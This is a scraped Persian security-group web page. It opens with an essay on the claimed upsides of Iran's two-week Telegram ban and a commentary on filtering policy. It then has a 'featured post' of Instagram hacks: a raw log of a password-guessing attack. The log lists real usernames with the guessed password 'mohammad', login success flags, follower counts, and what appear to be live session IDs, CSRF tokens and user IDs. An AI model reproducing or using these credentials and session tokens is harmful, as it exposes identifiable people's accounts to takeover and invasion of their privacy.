دهم دی ماه سال 1396 محبوب ترین پیام رسان خارجی در ایران به دستور” شورای عالی امنیت ملی ” فیلتر و 14 روز بعد در تاریخ 23 دی ماه رفع فیلتر شد. پیام رسانی که به نقل قول های متعدد بیش از 40% کاربران آن را مشترکان ایرانی تشکیل می دهند.

این درحالی‌ است که به گفته رئیس انجمن صنفی کسب و کارهای اینترنتی “حدود نیم میلیون فرصت شغلی که وارد این شبکه‌های مجازی شده‌اند و همچنین چند شرکت دانش بنیان خدمات تخصصی در این زمینه، پس از فیلترینگ معلق شدند”.

همچنین به گفته سید مرتضی موسویان رئیس مرکز توسعه فناوری اطلاعات و رسانه‌های دیجیتال وزارت ارشاد، در آمار رسمی این سازمان ۱۹ هزار کانال شامددار به ثبت رسیده که از این تعداد ۹۰۰۰ کانال مرتبط با فروش کالا یا خدمات بوده‌اند.

همه شما عزیزان به اهمیت فعالیت این پیام رسان در ایران، از همه جهات واقف هستید و مضرات فیلتر شدن تلگرام را بطور کامل می دانید ولی تا بحال به مزایای این فیلترینگ دقت کرده اید؟ به نظر شما 2 هفته فیلتر شدن تلگرام چه بازخوردهای مثبتی به همراه داشت؟ آیا پیش از فیلترینگ این پیام رسان به مزایای آن فکر شده بود ؟ در ادامه به نکاتی در این رابطه بصورت کاملا مختصر اشاره خواهیم کرد.

1. یکی از مهمترین مزایای این دوره طلایی افزایش سواد عمومی جامعه در حوزه IT در درک تفاوت بین پروتکل های مختلف، آشنایی مختصر با مفاهیم امنیتی و درک پورت و آی پی و استفاده از انواع و اقسام فیلتر شکن ها بود.بطوری که خیلی از مردم عزیز نحوه استفاده از سرورهای شخصی بعنوان فیلترشکن را یاد گرفته و به دست عموم رساندند و خیلی از عزیزان نحوه استفاده از این فیلترشکن ها را فراگرفتند.

2. از دیگر مزایای این طرح می توان به افزایش امنیت کاربران اشاره کرد بطوری که در این مدت هیچ یک از کاربران ایرانی به هیچ عنوان با استفاده از آدرس آی پی حقیقی خود از تلگرام استفاده نکرده و عملا احتمال امکان ردیابی کاربران در مصادیق مجرمانه در این دوهفته ، به شرط استفاده از شماره های مجازی نزدیک به صفر شد.

3. نکته حائز اهمیت دیگری که باعث متضرر شدن اپراتورهای همراه شد آشنا شدن مردم با نحوه استفاده از تماس صوتی بود تلگرام بود که مدت هاست بخاطر جلوگیری از ضرر به اپراتورهای همراه، بسته شده بود.

4. آمادگی بیش از پیش تلگرام برای جلوگیری از فیلتر شدن مجدد با راه اندازی شبکه باز تلگرام یا TON در فصل اول سال 2018 میلادی به گفته پاول دوروف، مدیر عامل و بنیان گذار تلگرام و همچنین کاهش بازه زمانی تکمیل این پروژه از سه ماه به یک ماه و تقریبا غیرقابل فیلتر شدن تلگرام از مزایای دیگر این طرح بود.

علاوه بر نکات بالا بازخوردهایی نیز در این میان کاملا محسوس بود که بعنوان مثال می توان به شکست سنگین پیام رسان های ایرانی حتی با اعمال فیلترینگ در رقابت با تلگرام، ناتوانی دولت در فیلتر کردن کامل یک شبکه اجتماعی، وابستگی اقتصادی و معیشتی مردم به شبکه های اجتماعی، ناکارآمد بودن طرح شامد در جلوگیری از فعالیت های غیر متعارف کانال های تلگرامی، افزایش اعتماد مردم به رعایت حریم شخصی کاربران توسط تلگرام و … اشاره کرد.

=-=-=-=-=-=-=

مطالب بیشتر :

تیم امنیتی ایران

@IrSecTeam_Org

 

تلگرام اره ای که امکان جابه جایی ان دیگر نیست: تلگرام دیگه برای یک ایرانی یک پیام رسان نیست، بلکه همه چیزی است که از اینترنت نیاز داره . خوبی ها و بدی های خودشو داره ولی مهمترین ضرری که تلگرام به ما میزنه به نظر من بسته بودن تلگرامه و جلوگیری اون از رشد اینترنت فارسی و تولید محتوی ، امروزه حتی افرادی که تلگرام دارن یک ایمیل ساده ندارن و نیازی هم نمیبینن که داشته باشن. دیگه وبلاگ نویس نمیبینید و همه یه کانال میزنن و مطالبشون رو اونجا مینویسن. مطالبی که هیچ وقت در اینترنت واقعی منتشر نمیشن و اگر شما لینک کانال یا اون گروه رو نداشته باشید هیچ وقت بهشون نمیرسید. مطمئنا این خوب نیست. یعنی فاجعه است . چرا این شد چرا تلگرام برای ما همه چی شد؟ جوابش ساده است به لطف فیلترینگ داسی سالهای پیش همه نیاز ها به سمت تلگرام کشیده شد. در فضایی که حتی یک وبلاگ با ۵ کاربر ماهانه بر روی بلاگفا تحمل نمیشد و مدیران وب سایت ها بابت یک کامنت بازداشت میشدن و سایت ها که همه چیز یک فرد بودن به راحتی فیلتر میشد مردم که خود عقل و شعور دارن ، اینجا احساس آرامش بیشتری داشتن. ولی آیا میشه تلگرام رو فیلتر کرد؟ جوابش ساده است : خیر. وقتی بیش از نیم میلیون شغل به گفته خود آقایان در تلگرام به وجود اومده دیگه شما فقط با تفریح یا خبر سر و کار ندارید بلکه دارید تصمیم مهتری میگیرید اینجا به سفره مردم هم وصل شده. البته قابل پیشبینی بود که ممکنه تلگرام فیلتر بشه ولی حوادث این روزها نشون داد که دیگه حتی تصمیم به فیلتر تلگرام از تصمیم به جهت دادن مردم به رفتن به سمتش غلط تر بود. چرا؟ جوابش در دانلود روزی ۷۰۰ هزار فیلترشکنه . باور کنید اگر رتبه بدترین کشور رو برای بدافزار های موبایل داریم دلیلش اینه که از ۱ بالاتر در این جدول دیگه جایگاهی نیست . من با حرف های سردار جلالی ریاست محترم پدافند غیر عامل موافقم بله تلگرام ایران رو اشغال کرده ولی دلیلش فقط شمایید که تنوع استفاده از سرویس های جهانی رو بروی ایرانی ها بستید و به امید اینکه شاید تلگرام شاید شاید به حرفتون گوش کنه با طنابش رفتید ته چاه و ملت رو هم بردید با خودتون. دیدید که در شرایط بحرانی قطعا تلگرام کانال هایی رو که لیست میکنید نمیبنده و فقط فیلتر تلگرام تاثیر حداکثر ۲ روزه بر روی مخاطبینش داره . ولی جالب تر از فیلتر تلگرام در این کشور استفاده همین مسئولین از سرویس های درست دنیا مثل تویتره . در همین شرایط تریبون وزرای محترم در حالی تویتره که سالهاست تویتر در ایران فیلتره !!. و جالب تر از اون اینه که حتی در شرایطی که تلگرام فیلتر نیست شما کانال رسمی یا گروه رسمی دولتی در اون نمیبینید ولی همزمان میتونید همه رو در تویتر پیدا کنید . برای کی توویت میکنن من نمیدونم :grin:. اگر دیوونه خونه نیست به منم بگید من بدونم کجاست. حالا باید دید رویکرد بعدی دولت محترم چیه و چطور این فاجعه اینترنت ایران که هر روز هم عمیق تر میشه رو مدیریت میکنه مطمئن باشید پاول برای همه ما خواب های رنگی تری هم دیده . پیشنهاد من باز کردن هر چه سریعتر سرویس های مهم دنیا به روی همه ایرانی هاست از جمله تویتر و فیسبوک و یوتیوب و تغییر نگرش داسی فیلترینگ به نگرش تعامل با دنیا و یا تبدیل نگرش داسی به ساتوری و بستن مطلق همه چی از تلگرام و فیلتر شکن ها گرفته تا هر چیزی که جدید میاد برای همیشه فقط مشکلش اینه که هر روز یه چیزی میاد تقریبا :joy: یا اینکه ببندیم اینترنت و راحت کنیم همه رو /// البته تجربه ثبات کرده حتما این اتفاقها نمیفته و همین مسیر شل کن و سفت کن رو میریم متاسفانه . جرجندی @webamoozir

Featured post

Iranian Instagram hacks

https://mohammad.khonji1384:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 186, Following: 479, Posts: 0, Is_Private: false, Orginal: false @hacracker||VNJHJPFNVRJNHABBDCMP|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 186, Following: 479, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511530972\054 \”94.102.54.95\”: 29073}:1eIEFo:cuXfbS4ORm9dD05HklszG86fNYI”; ds_user_id=6408296754; Max-Age=7776000; csrftoken=ZE7zZg7fxifZzB8bbDlZJF396M83y3Ji; rur=ASH; sessionid=6408296754%3AOQB7OL5Z9hHaIk%3A10; target=””; mid=Whgh2AALAAFyJbHnnBFqI5SOuAZo; ig_vw=1024; ig_pr=1|||1511502152|0||3||||
https://mo13ham89mad:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 34, Following: 46, Posts: 155, Is_Private: false, Orginal: false @hacracker||SMPIHFLGOYYCMRIDSRFZ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 34, Following: 46, Posts: 155, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531157\054 \”94.102.54.95\”: 29073}:1eIEIo:ErTJp8dNuq2wpqph_SnWmBcxfx8″; csrftoken=B7eqau1d0TKleqKbSuDMsB8s1D6gGctg; Max-Age=31449600; rur=FRC; mid=WhgilAALAAHv180Ww_HKe7hfd038; ig_vw=1024; ig_pr=1|||1511502339|0||3||||
https://kr_javad:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 76, Following: 38, Posts: 8, Is_Private: true, Orginal: false @hacracker||RGKVOUNYDZTOPKNHYAFK|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 76, Following: 38, Posts: 8, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531175\054 \”94.102.54.95\”: 29073}:1eIEJ5:epO7byMIsG_8pnOhHA51zXUSEdY”; ds_user_id=6363607729; Max-Age=7776000; csrftoken=sXtjYJiIGJD5L5WKuAyfaja7T6V8zSTP; rur=ATN; sessionid=IGSCeefe21eb39cd4a2461596ab38da0830341125fb6c1f6cbff9f49b1643a476220%3AAVPaKqzLyk90txsnuWIzDaWCsNYiuwHH%3A%7B%22_auth_user_id%22%3A6363607729%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226363607729%3A0xKG7es3Y6AfdjQlgUgr4dKPU02S2myU%3A0d01999bc3bc05c03531d25de492afa87783ab4bad330be7b6148a9ce526d018%22%2C%22last_refreshed%22%3A1511531172.1553990841%7D; target=””; mid=WhgiowALAAF3pr-We5oappmXPU-t; ig_vw=1024; ig_pr=1|||1511502356|0||3||||
https://mohammad1_evin:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 148, Following: 206, Posts: 6, Is_Private: false, Orginal: false @hacracker||PRSMRZTLMVZDBPYLOHZL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 148, Following: 206, Posts: 6, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531413\054 \”94.102.54.95\”: 29073}:1eIEMv:sJED-qKv8GU6iv9RjbrxeA-5PoY”; ds_user_id=6174104532; Max-Age=7776000; csrftoken=GYv9LIA9oqTmG4B4nowup4Evw0CIFLc8; rur=PRN; sessionid=IGSCb668f6f4f85df94ada905ccec7d348b51b9b9c4c688ead85210d06e89d85b4f8%3AFp1PmOLyc6DJcIDoiZignz2eKVlx5Sw8%3A%7B%22_auth_user_id%22%3A6174104532%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226174104532%3A8haAXgaACncpbTFvIUOeiD4M8zvnohdz%3A21731f3d9d455ecc665f543891b15d039e17be9237a4f23fb221b249e22de441%22%2C%22last_refreshed%22%3A1511531411.1427969933%7D; target=””; mid=WhgjkQALAAE5Uf3nq6_Bgj_BPxMV; ig_vw=1024; ig_pr=1|||1511502593|0||3||||
https://mohamma.s7:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 65, Following: 65, Posts: 25, Is_Private: true, Orginal: false @hacracker||YCOYKPLGWRUUMOQMHERM|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 65, Following: 65, Posts: 25, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531489\054 \”94.102.54.95\”: 29073}:1eIEOA:i3QVotCfyNKTLpY2WOzXFfW_wQc”; ds_user_id=6289580252; Max-Age=7776000; csrftoken=53DEGpkX4uX8eyoziOUGrdhqJeNHNraP; rur=ASH; sessionid=IGSC294a0f6b8beac0404539b53964e88594abffa3545f7fe562f354a4d5c7d8bdf8%3AC1bcPjAsKrGpGVl5NqiPAZBTvJW9r5aK%3A%7B%22_auth_user_id%22%3A6289580252%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226289580252%3AnZEAVzORjUvPqBznQfytDVjdkbff6n78%3A6da1f57f82989ed9fb530a00e72749744077f207f543a4b032dc2ac38c8246f9%22%2C%22last_refreshed%22%3A1511531488.1830217838%7D; target=””; mid=Whgj3gALAAH9lExEiWjpBkMlvF48; ig_vw=1024; ig_pr=1|||1511502672|0||3||||
https://ma.hdi3165:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 57, Following: 243, Posts: 3, Is_Private: false, Orginal: false @hacracker||BPUCOUGPFXNZMHMVBAAK|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 57, Following: 243, Posts: 3, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531559\054 \”94.102.54.95\”: 29073}:1eIEPH:96OaqBigxWyNxBg8f4WvvRe_Oes”; ds_user_id=6320667573; Max-Age=7776000; csrftoken=FRdZcIdZtX8D5d5UYAPb6hcpHKBceCGI; rur=FRC; sessionid=IGSC31cb5d35749dc53fedd8e9d1d45ef27765c6f82196eade71a15379415f561d97%3AzXAMzlraRz1lDqpnSkbCcibmVCcJzioR%3A%7B%22_auth_user_id%22%3A6320667573%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226320667573%3Aw6hy0OXp7PvcurB3fM4zFWntFl7BBHEf%3Ad165488a93cc3770c59e9f033c60e7797c074622577e154023977aa64a51210d%22%2C%22last_refreshed%22%3A1511531555.2398791313%7D; target=””; mid=WhgkIQALAAGnf7eiUPch4OkVrF58; ig_vw=1024; ig_pr=1|||1511502740|0||3||||
https://mohammadre9086:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 3, Following: 8, Posts: 0, Is_Private: false, Orginal: false @hacracker||QJKQFZZRDVIXUCOJMENQ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 3, Following: 8, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531576\054 \”94.102.54.95\”: 29073}:1eIEPa:sOtkcjAupBHMZWjyb138TuCwp4g”; csrftoken=mKWTN5aQW7UybneXqWr23BrqTyQFanXr; Max-Age=31449600; rur=FRC; mid=WhgkNQALAAEfQVcVvSAgOiSV7ilm; ig_vw=1024; ig_pr=1|||1511502760|0||3||||
https://mohammadmahde6869408:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 38, Following: 103, Posts: 11, Is_Private: true, Orginal: false @hacracker||PXLALMXUAYMNQIRKINYT|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 38, Following: 103, Posts: 11, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531628\054 \”94.102.54.95\”: 29073}:1eIEQR:hGeB42DhgZu60HVZbo17Xd4nBCA”; csrftoken=LpRXei3jTRB51FhF3yfOPGTYosZjLz9Z; Max-Age=31449600; rur=FRC; mid=WhgkagALAAE3nxLwSZUdC6QfnRaJ; ig_vw=1024; ig_pr=1|||1511502812|0||3||||
https://mohammad.afshar.pv:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 258, Following: 505, Posts: 19, Is_Private: true, Orginal: false @hacracker||XLFPMHNGIWRTCYKKSUGB|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 258, Following: 505, Posts: 19, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531660\054 \”94.102.54.95\”: 29073}:1eIEQx:wzlHtzQS7beGFPYfJKa1-Ega1S4″; csrftoken=c0sqy41UsJA0A2fAKI01iDE5MoF2uGDp; Max-Age=31449600; rur=FRC; mid=WhgkiwALAAH2_I5yRaDfMDduT4wp; ig_vw=1024; ig_pr=1|||1511502844|0||3||||
https://zarymhmd407:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 545, Following: 589, Posts: 2, Is_Private: false, Orginal: false @hacracker||OZZTKOGIFXDLCQAXCEDL|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 545, Following: 589, Posts: 2, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531664\054 \”94.102.54.95\”: 29073}:1eIER0:NNYrBkb8k2x5r-CqtoJpHYn-c5g”; csrftoken=rwZwuUXXILRT5jXO6EvCLYk3paqeXjZ0; Max-Age=31449600; rur=FRC; mid=WhgkjgALAAGOGg8znFI4sz_KHqQK; ig_vw=1024; ig_pr=1|||1511502848|0||3||||
https://mohammad.alizade7596:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 1,483, Following: 735, Posts: 9, Is_Private: true, Orginal: false @hacracker||KZCZRCNDAXIXLMAIEWTV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 1,483, Following: 735, Posts: 9, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531707\054 \”94.102.54.95\”: 29073}:1eIERf:MuOXRw18vfjX0Bd-YP5Kb7A_XmY”; ds_user_id=4528650261; Max-Age=7776000; csrftoken=ugKJ9edcAlPXQwYxnyzWrTK4eTAyhOZA; rur=FRC; sessionid=IGSC8451ebbe000d36b454da595ac185e7590cf7dd857adb30415b3c9a9a9aa23b46%3A5dBgRjNcH7fZB0h9brlFjzzQgMH3z2u9%3A%7B%22_auth_user_id%22%3A4528650261%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%224528650261%3AubwHU9vYkRaD8IAnmDYlq8ERW4WU3vWI%3A743f8493837ed0d38ae235b7a5718f3f4b084ec7b5cc89bfbaedd91ae7dc33f4%22%2C%22last_refreshed%22%3A1511531704.8089597225%7D; target=””; mid=WhgktwALAAFz1AroO9zPsT_qekR9; ig_vw=1024; ig_pr=1|||1511502889|0||3||||
https://i.6441:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 92, Following: 512, Posts: 38, Is_Private: false, Orginal: false @hacracker||RSKPEEUYHQUPXYYAJKLD|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 92, Following: 512, Posts: 38, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531769\054 \”94.102.54.95\”: 29073}:1eIESf:bsZJCfd4xwJkzlTNtj-M0ma1LGQ”; csrftoken=4JwzytncAs9Pjup7I9FxrTmLWmayAypx; Max-Age=31449600; rur=FRC; mid=Whgk9gALAAF5oRr8nhQLQzMXkseG; ig_vw=1024; ig_pr=1|||1511502950|0||3||||
https://hana_96.147:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 92, Following: 535, Posts: 13, Is_Private: true, Orginal: false @hacracker||ZHOLBPGUHKZWUTDRFVJC|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 92, Following: 535, Posts: 13, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531861\054 \”94.102.54.95\”: 29073}:1eIEU9:Uba7ybgVHzq69AMkDlNrBXLG-3I”; ds_user_id=6240677480; Max-Age=7776000; csrftoken=hMtswgEoYzFlf6X7bezVLPswKfXIQLLx; rur=FRC; sessionid=IGSCca7786d01d594bf678d241389a128ba22da82444eb6a68ed05cea512440ee845%3AiouXCj2Th1rvRlFxSNNpKbC6opMSuxly%3A%7B%22_auth_user_id%22%3A6240677480%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226240677480%3AmhGhC4YJ7rfYc4bqhvyrHARCSMgumkJN%3A2a4cfcd2cada6931b8537ea989fe6afb7d76353b7369510baf110362541102fd%22%2C%22last_refreshed%22%3A1511531858.2678015232%7D; target=””; mid=WhglUAALAAFGfEhOwSs_f55lrpyl; ig_vw=1024; ig_pr=1|||1511503043|0||3||||
https://arian671:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 121 – Found data to capture: Followers: 17, Following: 139, Posts: 2, Is_Private: true, Orginal: false @hacracker||LEHLIOAHVYZKBBQQAAUV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 17, Following: 139, Posts: 2, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531921\054 \”94.102.54.95\”: 29073}:1eIEV9:P6mN6SdLkkkiqjV7mfQuOCbXEr8″; csrftoken=ZypxWKCvoS7ITJBFW4AdXsJD4fGPBUML; Max-Age=31449600; rur=FRC; mid=WhglkAALAAGhul9m-izx1BDVZxYG; ig_vw=1024; ig_pr=1|||1511503104|0||3||||
https://morteza.aghaei9159:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 248, Following: 1,092, Posts: 0, Is_Private: false, Orginal: false @hacracker||IFASKTZMVVZWXVIHTFLB|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 248, Following: 1,092, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531945\054 \”94.102.54.95\”: 29073}:1eIEVV:09pf9DZ1uC3187mNC9brE6PbdLE”; ds_user_id=6148440655; Max-Age=7776000; csrftoken=fFvmdXebJxvfPzVGfWrcgs1L7g68nTdS; rur=PRN; sessionid=IGSC0234bf339f5f6024bfb04a050f606596aa3610b61b1be7a99aaf1e10701ea29c%3A9xqMJL51HGAQJmptsY7BHf01zyBLCyFG%3A%7B%22_auth_user_id%22%3A6148440655%2C%22_auth_user_backend%22%3A%22accounts.backends.CaseInsensitiveModelBackend%22%2C%22_auth_user_hash%22%3A%22%22%2C%22_platform%22%3A4%2C%22_token_ver%22%3A2%2C%22_token%22%3A%226148440655%3AMn4y6kUHjkjxKAFM14DzQlUMJp1Um503%3Af885d7c06ffd81a007a2df39c4454ffd2a942bfca608c796e9222af9ae418194%22%2C%22last_refreshed%22%3A1511531942.626101017%7D; target=””; mid=WhglpQALAAEOJzRrLvr18l2UMem4; ig_vw=1024; ig_pr=1|||1511503127|0||3||||
https://fasaa_1:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 38, Following: 259, Posts: 0, Is_Private: false, Orginal: false @hacracker||LNHZQVTGXKSZOLBXXEHV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 38, Following: 259, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511531974\054 \”94.102.54.95\”: 29073}:1eIEVy:xcLDd29dxKZKJ2qZeWzw8vHj0IQ”; csrftoken=gb4kwvOF7i5fllwVy3bqy2issbzCS9fP; Max-Age=31449600; rur=FRC; mid=WhglwwALAAEMasZzAiwd0v4HwQYb; ig_vw=1024; ig_pr=1|||1511503156|0||3||||
https://mohmmad_219:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 77, Following: 201, Posts: 0, Is_Private: false, Orginal: false @hacracker||LQSBZUBRQFHETAFOQAUR|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 77, Following: 201, Posts: 0, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532257\054 \”94.102.54.95\”: 29073}:1eIEaX:otJ7gFwBzGkf3p3OaBuC8Y-0QLY”; csrftoken=udXdAxGDVNHGNJtMJD4ZqhZAeWGU7KKr; Max-Age=31449600; rur=FRC; mid=Whgm3wALAAF0DtYrhSWlB3W6jH1N; ig_vw=1024; ig_pr=1|||1511503439|0||3||||
https://ho3ein5667:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 648, Following: 3,161, Posts: 12, Is_Private: false, Orginal: false @hacracker||XKROFATJBTVJNRROBVRY|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 648, Following: 3,161, Posts: 12, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532461\054 \”94.102.54.95\”: 29073}:1eIEdp:BTuGlBbauqgKnju1ceBQSPh2TdY”; csrftoken=lm13mPFceixxDEOslRsBagJ35kSPWpME; Max-Age=31449600; rur=FRC; mid=WhgnqgALAAF9aRPqYTwHLt4l37HZ; ig_vw=1024; ig_pr=1|||1511503643|0||3||||
https://msdy1573:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 45, Following: 297, Posts: 0, Is_Private: false, Orginal: false @hacracker||CDLKFFGIALLGFWFVWLBV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 45, Following: 297, Posts: 0, Is_Private: false, Orginal: false @hacracker|csrftoken=EMQAaDo0e6Zem5g3VIyU0X82WcyXlwQv; Max-Age=31449600; rur=FRC; mid=WhgnswALAAHQdgpD0PUo-EmEwkJf; ig_vw=1024; ig_pr=1|||1511503650|0||3||||
https://ho3ein.kazemiii:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [authenticated”: true] – Source Length: 53 – Found data to capture: Followers: 159, Following: 394, Posts: 10, Is_Private: true, Orginal: false @hacracker||EHXURJOGXYRECLHEFCEV|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 159, Following: 394, Posts: 10, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532468\054 \”94.102.54.95\”: 29073}:1eIEdx:Mj4VB5nJXH0QgxjWT1jEoqlxTk8″; ds_user_id=6044022884; Max-Age=7776000; csrftoken=DuehmD12i9mz49A6Xih3zBksxGLFOLJI; rur=FTW; sessionid=6044022884%3AEovYbJk5hS7yGB%3A27; target=””; mid=WhgnsQALAAEgpBWu5LW-Np1QPHnt; ig_vw=1024; ig_pr=1|||1511503650|0||3||||
https://zmny3296:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 140, Following: 137, Posts: 13, Is_Private: false, Orginal: false @hacracker||EWSRBLRQBPKESVJJZJWS|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 140, Following: 137, Posts: 13, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532600\054 \”94.102.54.95\”: 29073}:1eIEg6:6cDi1zowx_y-pq6iXyasuWNPMDM”; csrftoken=gJBxPCsS4OYJqXmvKQeuFztXsMnS2mbg; Max-Age=31449600; rur=FRC; mid=WhgoNwALAAFEcE3aLvflYuLFm3cu; ig_vw=1024; ig_pr=1|||1511503783|0||3||||
https://mhmmd1722:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 165, Following: 283, Posts: 9, Is_Private: false, Orginal: false @hacracker||BZYAVFVQFOZHMJIPIHZJ|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 165, Following: 283, Posts: 9, Is_Private: false, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532723\054 \”94.102.54.95\”: 29073}:1eIEi4:H4FXE1KeAFXU_1vcoJgXVSLgMqc”; csrftoken=gpMx966YptN8bc2VhEtdjhwvivbi8PfW; Max-Age=31449600; rur=FRC; mid=WhgosgALAAHUHfWicQ52CUF22MB6; ig_vw=1024; ig_pr=1|||1511503906|0||3||||
https://nsrynmyrzy:mohammad@www.instagram.com/||After Additional Redirect -> Success Source Keyword Match -> Found Key [checkpoint_required] – Source Length: 122 – Found data to capture: Followers: 131, Following: 172, Posts: 0, Is_Private: true, Orginal: false @hacracker||TWMHUCHMQIAPJUKKKYUY|[hamedhomayoun]|Pw|2|0|instagram account details -> Followers: 131, Following: 172, Posts: 0, Is_Private: true, Orginal: false @hacracker|urlgen=”{\”time\”: 1511532727\054 \”94.102.54.95\”: 29073}:1eIEi9:0XkXA3vtR4AtwfbyjEFyAW-RnbE”; csrftoken=01EmlxG5BlpLCr2GrJ0FlI5ybYoqXLqQ; Max-Age=31449600; rur=FRC; mid=WhgotQALAAFtr5TIUx3-ykLo_Cb0; ig_vw=1024; ig_pr=1|||1511503910|0||3||||
